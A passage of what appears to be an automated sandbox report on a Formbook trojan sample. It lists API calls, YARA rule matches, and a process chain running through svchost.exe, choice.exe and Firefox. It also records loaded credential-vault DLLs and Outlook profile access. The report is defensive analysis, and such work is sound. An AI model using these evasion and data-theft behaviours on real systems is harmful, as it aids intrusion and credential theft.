          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CD0 NtEnumerateKey,2_2_03672CD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673C90 NtOpenThread,2_2_03673C90
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_00431BE8: GetFullPathNameW,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_004096A00_2_004096A0
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0042200C0_2_0042200C
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0041A2170_2_0041A217
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_004122160_2_00412216
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0042435D0_2_0042435D
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_004033C00_2_004033C0
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0044F4300_2_0044F430
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_004125E80_2_004125E8
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0044663B0_2_0044663B
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_004138010_2_00413801
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0042096F0_2_0042096F
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_004129D00_2_004129D0
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_004119E30_2_004119E3
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0041C9AE0_2_0041C9AE
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0047EA6F0_2_0047EA6F
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0040FA100_2_0040FA10
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0044EB5F0_2_0044EB5F
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_00423C810_2_00423C81
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_00411E780_2_00411E78
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_00442E0C0_2_00442E0C
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_00420EC00_2_00420EC0
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0044CF170_2_0044CF17
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_00444FD20_2_00444FD2
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_044036180_2_04403618
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004181E32_2_004181E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E8432_2_0042E843
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012402_2_00401240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402A402_2_00402A40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032702_2_00403270
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FA7A2_2_0040FA7A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FA832_2_0040FA83
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004163CE2_2_004163CE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004163D32_2_004163D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401C132_2_00401C13
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004024E02_2_004024E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401CF02_2_00401CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FCA32_2_0040FCA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DD232_2_0040DD23
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040269F2_2_0040269F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026A02_2_004026A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF3302_2_036FF330
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3102_2_0364E310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036313802_2_03631380
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F124C2_2_036F124C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362D2EC2_2_0362D2EC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0368717A2_2_0368717A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DD1302_2_036DD130
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F1132_2_0362F113
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370010E2_2_0370010E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B1E02_2_0365B1E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036451C02_2_036451C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EE0762_2_036EE076
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F70F12_2_036F70F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364B0D02_2_0364B0D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036300A02_2_036300A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367508C2_2_0367508C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036427602_2_03642760
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364A7602_2_0364A760
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F67572_2_036F6757
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036646702_2_03664670
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036ED6462_2_036ED646
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DD62C2_2_036DD62C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C6002_2_0365C600
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C6E02_2_0363C6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B36EC2_2_036B36EC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF6F62_2_036FF6F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA6C02_2_036FA6C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036406802_2_03640680
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370A5262_2_0370A526
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF5C92_2_036FF5C9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F75C62_2_036F75C6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036404452_2_03640445
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFB2E2_2_036FFB2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640B102_2_03640B10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367DB192_2_0367DB19
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4BC02_2_036B4BC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FEA5B2_2_036FEA5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FCA132_2_036FCA13
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365FAA02_2_0365FAA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFA892_2_036FFA89
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036859C02_2_036859C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363E9A02_2_0363E9A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FE9A62_2_036FE9A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036268682_2_03626868
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036498702_2_03649870
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B8702_2_0365B870
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF8722_2_036FF872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E08352_2_036E0835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036438002_2_03643800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E8102_2_0366E810
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F78F32_2_036F78F3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036428C02_2_036428C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F18DA2_2_036F18DA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B98B22_2_036B98B2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036568822_2_03656882
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFF632_2_036FFF63
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364CF002_2_0364CF00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03646FE02_2_03646FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F1FC62_2_036F1FC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FEFBF2_2_036FEFBF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0E6D2_2_036E0E6D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660E502_2_03660E50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632EE82_2_03632EE8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F9ED22_2_036F9ED2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F0EAD2_2_036F0EAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03641EB22_2_03641EB2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640D692_2_03640D69
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F7D4C2_2_036F7D4C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFD272_2_036FFD27
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363AD002_2_0363AD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DFDF42_2_036DFDF4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03649DD02_2_03649DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652DB02_2_03652DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03643C602_2_03643C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F6C692_2_036F6C69
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FEC602_2_036FEC60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EEC4C2_2_036EEC4C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364AC202_2_0364AC20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630C122_2_03630C12
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365FCE02_2_0365FCE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370ACEB2_2_0370ACEB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03658CDF2_2_03658CDF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D9C982_2_036D9C98
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeCode function: 4_2_03FE7CC24_2_03FE7CC2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AE692 appears 84 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B910 appears 266 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675050 appears 36 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687BE4 appears 88 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BEF10 appears 105 times
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: String function: 004115D7 appears 36 times
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: String function: 00416C70 appears 39 times
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: String function: 00445AE0 appears 65 times
          Source: 8EhMjL3yNF.exe, 00000000.00000003.703518951457.0000000004C8D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 8EhMjL3yNF.exe
          Source: 8EhMjL3yNF.exe, 00000000.00000003.703521898586.0000000004923000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 8EhMjL3yNF.exe
          Source: 8EhMjL3yNF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.708578550328.0000000003FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.708574335375.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.705383176691.0000000006730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.708579283397.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.705376707747.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.708579534751.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.705378813444.0000000004D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.705378813444.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.708578550328.00000000035E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@18/12
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_004755C4
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0043305F FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeFile created: C:\Users\user\AppData\Local\Temp\unjustJump to behavior
          Source: 8EhMjL3yNF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: 8EhMjL3yNF.exeReversingLabs: Detection: 57%
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeFile read: C:\Users\user\Desktop\8EhMjL3yNF.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\8EhMjL3yNF.exe "C:\Users\user\Desktop\8EhMjL3yNF.exe"
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8EhMjL3yNF.exe"
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeProcess created: C:\Windows\SysWOW64\choice.exe "C:\Windows\SysWOW64\choice.exe"
          Source: C:\Windows\SysWOW64\choice.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8EhMjL3yNF.exe"Jump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeProcess created: C:\Windows\SysWOW64\choice.exe "C:\Windows\SysWOW64\choice.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\choice.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: winsqlite3.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\choice.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: 8EhMjL3yNF.exeStatic file information: File size 1336099 > 1048576
          Source: Binary string: choice.pdbGCTL source: svchost.exe, 00000002.00000003.705345811797.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.705345727655.000000000301A000.00000004.00000020.00020000.00000000.sdmp, SjhnWvlTMw.exe, 00000004.00000003.707411095047.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp
